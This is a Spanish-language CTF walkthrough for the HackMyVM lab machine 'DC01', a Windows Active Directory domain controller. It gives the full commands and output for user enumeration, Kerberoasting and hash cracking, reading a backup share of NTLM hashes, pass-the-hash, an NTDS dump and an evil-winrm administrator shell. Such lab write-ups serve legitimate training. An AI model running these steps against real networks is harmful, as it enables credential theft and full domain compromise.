DC01 – HackMyVM Link to heading
- OS: Windows
- Difficulty / Dificultad: Easy / Fácil
- Platform / Plataforma: HackMyVM
Resumen Link to heading
“DC01” es una máquina de dificultad fácil de la plafatorma HackMyVM la cual introduce algunos conceptos de Active Directory. Somos capaces de enumerar usuarios del dominio a través de una cuenta guest. Podemos entonces utilizar la herramienta GetUserSPNs de Impacket para obtener hashes para algunos usuarios e intentar crackearlos. Somos capaces de crackear el hash para un usuario y obtener su contraseña; obteniendo así acceso a recursos compartidos de respaldo. Estos recursos contienen hashes para algunos usuarios. Uno de estos hashes funciona para un usuario con privilegios máximo en el sistema, ganando así total control sobre éste.
User / Usuario Link to heading
Empezando con un escaneo con Nmap muestra múltiples puertos abiertos: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM); entre muchos otros:
❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.20.1.140
Aplicando algunos scripts de reconocimiento -sVC sobre estos puertos muestra:
❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 20:23 -03
Nmap scan report for 1.20.1.140
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-18 03:23:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:43:08:EC (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-18T03:24:23
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:43:08:ec (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.40 seconds
Estamos contra un entorno Active Directory.
Usando la herramienta NetExec contra el servicio SMB muestra:
❯ nxc smb 10.20.1.140
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
Tenemos un dominio: SOUPEDECODE.LOCAL.
Somos capaces de loguearnos en el servidor, a través de SMB, como el usuario guest:
❯ nxc smb 10.20.1.140 -u 'guest' -p ''
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
No obstante, no hay ningún recurso compartido interesante (lo cual se puede ver usando la flag --shares):
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --shares
SMB 1.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 1.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 1.20.1.140 445 DC01 [*] Enumerated shares
SMB 1.20.1.140 445 DC01 Share Permissions Remark
SMB 1.20.1.140 445 DC01 ----- ----------- ------
SMB 1.20.1.140 445 DC01 ADMIN$ Remote Admin
SMB 1.20.1.140 445 DC01 backup
SMB 1.20.1.140 445 DC01 C$ Default share
SMB 1.20.1.140 445 DC01 IPC$ READ Remote IPC
SMB 1.20.1.140 445 DC01 NETLOGON Logon server share
SMB 1.20.1.140 445 DC01 SYSVOL Logon server share
SMB 1.20.1.140 445 DC01 Users
Hay un recurso llamado backup (respaldo), pero no tenemos permisos para leerlo como el usuario actual.
Usando la flag --rid-brute con NetExec para obtener usuarios nos devuelve algo:
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute
SMB 1.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 1.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 1.20.1.140 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 1.20.1.140 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB 1.20.1.140 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB 1.20.1.140 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
<SNIP>
SMB 1.20.1.140 445 DC01 2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB 1.20.1.140 445 DC01 2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB 1.20.1.140 445 DC01 2168: SOUPEDECODE\admin (SidTypeUser)
Tenemos múltiples usuarios.
Luego de aplicar algunos filtros con grep, podemos guardar todos los potenciales usuarios en una lista ejecutando:
❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute | awk '{print $6}' | grep 'SOUPEDECODE' | grep -vE 'Enterprise|Domain|Schema|Group|Read-only|Cloneable|Cert|Key|RAS|Protected|Allowed|Denied|DnsAdmins|DnsUpdateProxy|guest:' | awk -F '\' '{print $2}' > potential_users.txt
Dado que somos capaces de enumerar usuarios con NetExec como el usuario guest, y dado que tenemos potenciales usuarios, veré si podemos extraer los hashes de estos usuarios con la herramienta GetUserSPNs.py de Impacket:
❯ impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Obtenemos el error KRB_AP_ERR_SKEW.
Para evitar este error podemos correr sudo ntpdate -s 10.20.1.140 antes del comando para sincronizar relojes entre el servidor y nuestra máquina. Adicionalmente, dado que la lista es demasiado grande la “dividiré” en 2 usando el comando sed. Dado que el archivo de potenciales usuarios tiene 1069 líneas, podemos borrar las líneas 600 a la 1069 ejecutando:
❯ sed '600,1069d' potential_users.txt > potential_users_part1.txt
Y luego guardar la segunda mitad borrando las primeras 599 líneas usando sed de nuevo:
❯ sed '1,599d' potential_users.txt > potential_users_part2.txt
Luego, podemos solicitar los hashes corriendo el comando para ambas listas de usuarios (que es simplemente la original dividida en 2 para evitar problemas con el tiempo con Kerberos):
❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part1.txt -outputfile hashes_found1
<SNIP>
❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part2.txt -outputfile hashes_found2
Podemos “unir” ambas listas de hashes obtenidos usando cat:
❯ cat hashes_found2 >> hashes_found1
y, luego de aplicar algunos filtros, obtenemos hashes para algunos usuarios:
❯ cat hashes_found1 | grep -vE 'PC\$|PC-'
$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$d1a00b576eedfa102b4650a56a55e0be9b90df0e3c3bb1d8565a5c38b3103d6a96fdf67d5afb98210b5789ce6ce137beea723d9fdee227e169e2720e8322d3f3b9c01828aae3d9184fd309bd6c08ff3479a9d4754a636d8bdb38729031ed50529b2cc1a6f8c0e9dc08b6cca2477bbead25a82425d7153fee9c46b92047aa1617b45c37fd4d40130663fc6363218f1f806a7a6ebcab0a0974bd6dc9e4ded6dd25abe2286aaec7dafda6e77981470138dac7c8e25d18d4c24578b0275c6039bd95a000bad7f4d01d92c385cfb5cf75d06afa36a0fa0a06de7b5bc2aba9d576de44482037f958dcf7643da5278a2a74900a39ec2629b8fab1e5301b8103f25ce2f0805a5b21fb99e49058219e97c5d32784253277bf978a61bc392e08c7fddab9d5004400bc264aa67aa446ba186f7d74c7e28872e881bf6b6dbd6671e973e588c3aef5ab8a2a54b51cf22f72fb2b787757aa975bc1f13c53c45ca6e72bd6d0f69a1c24ae445daef205bd676ad56f56a7598ad41024caefab2f274b6eaabf47680542bf0a8408c05fc7c08bcb6f06b413b598c053d5485f1443226486ccd4524a06f4550cd25ad869e6a03ea89a5823b577c91de6e43975c86898618a60cdd0270ca868deb92fcbcb6d26f0a081c8174c8a00181933eb86cce901f3103efe9de62639cab715729c935396ab8e51df592192aa24fc22843571ec8ed6e473a991f01bbba8503970675350ff4c8365a371894e3b35c025ecc1834d3e7f7d66e452478c265d79c1a037066089f157deb60e9929440249b0614ea6b72933c4c8213a870661a14cdfb08f4e6544d4c7393188cc030a7a8b920968e8a3ba70c99c97b607e8b90eb39454dc0b832866623b8b29e663c55aa307690117c5661fdf583955e734f43818f54070792a6cc7d4de9be7728c8fee3e40308bbc21e08b2a85fdacaf040e79f54f8118c726d5de2e0d800d2daaa69dd08bb1a558214f77cd901db13728921e9e22f46b9bd52682b4601439b0733e72b4ed637f45d5bd5413828d630a2d8380d021dc3863768db46be1122c1454f5f25542c0ed349c5d42269684aef0864012d31c29ea4ff8f4cd82f10fb6416f93f16a5f631153496077d044b5d8ecca61c37cecdcea245280adb5822ef5b366534311ffd11e37f47a973d555824d93ba04832d21de560ec16df8e2fb3e913703982154e81e1c4a57d8f54d6f7d47ad47fe3bf4f16e4a751d0c5f23377b558b33ce9b857c46ba6f8c426778f45dfa03a3ad5541451ee5418487af853f9e93e39f5edecbd29805edf74558eaee2fd6fccb9b89f0666a0500d4792effa68a24679295b656233a14633305be94146632eb53cc392ca161053d9c142d388c540d4c10a52768fe60900567656df96812eba72bef3c8bd92d40e138eff49544c7d07e93bc946e17610b39f90e30cb220c9e8b6188587b76906eb4c0b82dde0341127067a12da22ef5787247f0cf1805007577bbd14427327db97
$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$4e51f57152ccc7fb413a043a227bee411f211156cdce35fe261d3b223e384d447cf3219d03c906a0918232c968b024899212c90055f18d6d3c7edf7154e30845184b3a923c1a2aee0daaf97faeaa80c213c0ead533337ad09b35d19c19b17d99cc1b0a93d5f2c225bf0d055c0946700cf9c47d4c3337c8dbcf73824532c0f021d13d678c9eae1e91143087c7893c5a3b71f3a44398906c6f6852fb21286543bc912a5c0214bc62e7834205358790480b97c2938750d97b88ff663c3a295b5eb35e52b9a7d014573590699e6be20c83b42b2df3b09e79adeaecb526740d1d82cf4b053a9a399ed077849152be86be3d27466f3b5bdd228ab7932d84d182da906314fb22516fbcb650886280d7b2908cf70673c5d2c7508816a938f7fdde11a2146bc0282b36cddb9e736e5ed9b0cd3948d4ca89f3c83c686967e9399a0ebc23a9c111eb4e0fabf253cde5ac260d40f6d8ae2f14c40e3b21ef8010c54969e418d88e6a397b9c276bef9882ba92669583161ac9840a6d0bed1d2c4292a6960b7094da33baa08f26ccd8d3e8302a540fbd4301af7ede7e8c981571086559840512ff691b81b9c271caf5029200ce6e459df3e2a7ecb1aeffd9aec40613e2982d81cebedc94c55ae7df5592a3c6b79f732d47e6dc08e825885e9f9999dd258321a6369b56f148fbe2009f69874b06c40d2a3dea853d7cfadc63cd88da83598772126c0f852e95c1307a1987a6f950929625dae4777d10ae7d47a463d42d0b41557aa2314d27839bd6e64be7ff265a1375df00f26fcc10080bcbf862ab02de03b37e1d9271413c72f80e713a8b3ef57bbe72309d7f8c143e9467e5dbca69b9c1cf7f0f4e52aeed4be66b36534af835ee00d50e885290d0c4602eaecbd3cf6be43c8ec693968ca8fcd57a16faac6823ea2dd7bc32842fada434052835800c8f6a3cd7d8789fc499a50f206c2eff715fc3b481a77877911d18f06d97f392f8b65c3bdfb27bba4ff294aa6495d87ec7bcac4a58eeb401d5ef30a3fd86b5de3f18c6bd2693fbf7429fffb5b3383e3d3b505aaae7ff501ee2abf2d39bbd27285f197300eb6eb37d83e00a66ee46dae18ec30d295b2573302bb35b9f9d3be486d7dd11c200e5a7d96cdfcd801f60c335ae811266bbd13ef3986954f6f36053529161a560c52bc452f63ee849293a70cbef0053affff78b133055b352a918549fcea331bb57f69b8eac75f3ddc522702594ea83bd025f48be24b25cb6532794b169c70247d12fd3fef7166b2e9b2974d3a65e7f7b56977b94ec48e72b9e6f406a2e17869c69e3c1b75c80c7cc3b92d66ce1ac14aa3649cf2f6a7ee7849a87e988bbf8d8010fcda76a84b20495fe8df95766086695356bcaa90392fd2fc3a15923f0c6ed2bd5b458f6d119f1b6a14e56c0d915db35f31b4a9cdb375b99b4fce20c55e10d4377
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$53b4c659dac28bcd45263758813a4ac78a88190f35b5ea437e74aff3fe36fcdc8e916e30034214ff3fdbd5c92edf3eaeffec2e6337c585b72ae4d579a9c71da0142a04fe3747885a9f5316043030ca67e3c5788dcfa1ccb1cdd7eb345d2286676fee78588650aef8ec9fad25ab200e5ea850bafcf85e964513faddaa3fe5290cc2f96a2814b128e7a5455471dd95ad790a004f718fd551c2efa12e0fe38b1bdd626a08903ebba8cec1eaeb9dc3dfea1840a352875c0e8b0147f7df6f0d11fbec2d3de81c9b1a2784ee430bef5c034d37c603458f3806a44848351f4527983958afff11364f872039ac0c13d5fb9ed7c0284dbf5d53b557c2dd9c721dcdebf23a23a4115d6d76432a26ea0ffa38675375f6cda431fceaf5147109d9554c2217985e0411c5524a46417c6b03ecb3c041458d877bc6f2bbf5fb22007b0bce454d74ce181c21e376366fa4ade935ec36e11286538b9e15e4f383c15dce3bc251b336c04ae80e037d500cb4faebdec38249254011e6343a2fb87e55302a16d3b98b2e01b41f88628fe49e9b77ec55b6f62bd116e9061449400c7b5892da1af4d90c32b9c92e1104911c2f3425372729855cbdbb042b08da4843605bc2a8bf3ee95e3508e46a41c9777060c8d594bdcdc2abe37dbf05cae6128d7709c3b643c1f7432b3ae75e5d00bbc03216c9427851da6a66a8494f0c28bf82e19faaddef770aca0ffc0e2e6d89d6764089956c412a3d1707272b67557387dbdb71a5e8ddc0af6a7ddfe56e49f71b9c2bbc718ecf5a7bfdd7dd3e1074e49d6ad4962e19a0a1042cfb3ea35a335f1303d33191170e40d2132d0d3b2f50127a71ecb8ff06393f49799c950f074c94a74df665b58f194a61492520ba341507790087cd9d9402f4d72b30cd8da5024b4a88dc4ebe4e5d6b6f05d573aa3b1010ef27fe35ca739a8660053a88df878a76124a97bcc855672ae6b3ab943d79c694eb91f9137104886b734e3f77bb9bb8dabd2621c1c0a477d58717ea144a719cd7c66aacae4df9de35f0516d8f0141ed9c4cf6ff88c7345c47c180e7d662999371fce22745b5c3b9384bf2040672bcff4fb6ceb3cf32a8a26c7635e5568c727b8bc52089562cb8e8fab20ed2b4c98cd9afb46a693df24fe0eae7a500a34c97bdc9b8f73408fe50984a36ce072657aac8840287199fa4d1819dd6ee691106306d1a4418c72d5e8c26c3d476c74c8e3cdcffb11693c011c4d95ba57ffa6e1a8e594170719f142f65c15beb4ac9bf2f377de7c6cf36bba2b0593594323f18913d340bfba8070e72eef637d3dc861f63e4fa385df18a3f0240973d46b960aaabd18e4316955099884a83b67289c20385d78d0cb7933d2f3d486c0d0736f139e08e57831fdd0b43efe88abfc676583cab1a4b1f9566f1027a6d543d086d4d927bf632ad34d2dc5d924ed1abb26e
<SNIP>
Decido no considerar algunos hashes de usuarios con PC en sus nombres y crear una lista con ellos:
❯ cat hashes_found1 | grep -vE 'PC\$|PC-' > filtered_hashes
y trato de crackear estos hashes a través de un Brute Force Password Cracking junto con el diccionario rockyou.txt y la herramienta JohnTheRipper:
❯ john --wordlist=/usr/share/wordlists/rockyou.txt filtered_hashes
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!! (?)
1g 0:00:01:07 DONE (2024-10-17 21:40) 0.01480g/s 212311p/s 3131Kc/s 3131KC/s 0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Obtenemos una contraseña: Password123!!.
La contraseña es para uno de estos usuarios:
❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*'
krbtgt
DC01
file_svc
WebServer
DatabaseServer
FileServer
MailServer
BackupServer
ApplicationServer
PrintServer
ProxyServer
MonitoringServer
CitrixServer
firewall_svc
backup_svc
web_svc
monitoring_svc
De manera que las guardamos:
❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*' > potential_hash_user.txt
Y reviso para qué usuario corresponde la contraseña hallada con NetExec:
❯ nxc smb 10.20.1.140 -u potential_hash_user.txt -p 'Password123!!' --continue-on-success | grep -v 'Guest'
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\firewall_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\backup_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\web_svc:Password123!! STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\monitoring_svc:Password123!! STATUS_LOGON_FAILURE
Tenemos una password para el usuario file_svc. Así, tenemos credenciales file_svc:Password123!!.
NT Authority/System - Administrador Link to heading
Este usuario no es capaz de loguearse en la máquina víctima a través de WinRM. Sin embargo, si revisamos qué recursos compartidos puede leer, podemos ver que este usuario puede leer el recurso compartido backup en SMB:
❯ nxc smb 10.20.1.140 -u 'file_svc' -p 'Password123!!' --shares --filter-shares READ
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB 10.20.1.140 445 DC01 [*] Enumerated shares
SMB 10.20.1.140 445 DC01 Share Permissions Remark
SMB 10.20.1.140 445 DC01 ----- ----------- ------
SMB 10.20.1.140 445 DC01 backup READ
SMB 10.20.1.140 445 DC01 IPC$ READ Remote IPC
SMB 10.20.1.140 445 DC01 NETLOGON READ Logon server share
SMB 10.20.1.140 445 DC01 SYSVOL READ Logon server share
Podemos entonces usar la herramienta smbmap para ver el contenido de este recurso compartido:
❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' -r 'backup' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.20.1.140:445 Name: 10.20.1.140 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
./backup
dr--r--r-- 0 Mon Jun 17 13:41:17 2024 .
dw--w--w-- 0 Mon Jun 17 13:44:56 2024 ..
fr--r--r-- 892 Mon Jun 17 13:41:23 2024 backup_extract.txt
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
Hay un archivo llamado backup_extract.txt.
Lo descargamos con smbmap y la flag --download:
❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' --download 'backup/backup_extract.txt' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: backup\backup_extract.txt (892 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/HackMyVM/DC01/content/10.20.1.140-backup_backup_extract.txt
[*] Closed 1 connections
Leyendo su contenido muestra una serie de hashes NTLM.
❯ cat 10.20.1.140-backup_backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
Por tanto, dado que tenemos múltiples potenciales usuarios, podemos intentar una ataque Pass The Hash con estos hashes contra todos los potenciales usuarios dado que uno de estos podría funcionar. Guardamos estos hashes:
❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}'
c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117
❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}' > leaked_hashes
Luego, usando de nuevo NetExec y los hashes encontrados, vemos si alguno de estos funciona con los usuarios que encontramos al principio:
❯ nxc smb 10.20.1.140 -u potential_users.txt -H leaked_hashes
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
<SNIP>
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
Uno de los hashes funciona para el usuario FileServer$. Adicionalmente, puedo ver el mensaje Pwn3d! a través del servicio SMB, lo cual signfiica que el usuario FileServer$ tiene privilegios máximos en la máquina víctima.
Por tanto, -y aunque este usuario ya es téxnicamente administrador- podemos usar NetExec para dumpear todos los hashes del sistema. En este caso simplemente dumpearé el hash del usuario Administrator:
❯ nxc smb 10.20.1.140 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --ntds --user Administrator
SMB 10.20.1.140 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.20.1.140 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
SMB 10.20.1.140 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.20.1.140 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
SMB 10.20.1.140 445 DC01 [+] Dumped 1 NTDS hashes to /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds of which 1 were added to the database
SMB 10.20.1.140 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.20.1.140 445 DC01 [*] cat /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.20.1.140 445 DC01 [*] grep -iv disabled /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | cut -d ':' -f1
Y uso este hash junto con evil-winrm para conectarme a la máquina víctima a través del servicio WinRM:
❯ evil-winrm -i 10.20.1.140 -u 'Administrator' -H '88d40c3a9a98889f5cbb778b0db54a2f'
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
soupedecode\administrator
GG.
~Happy Hacking.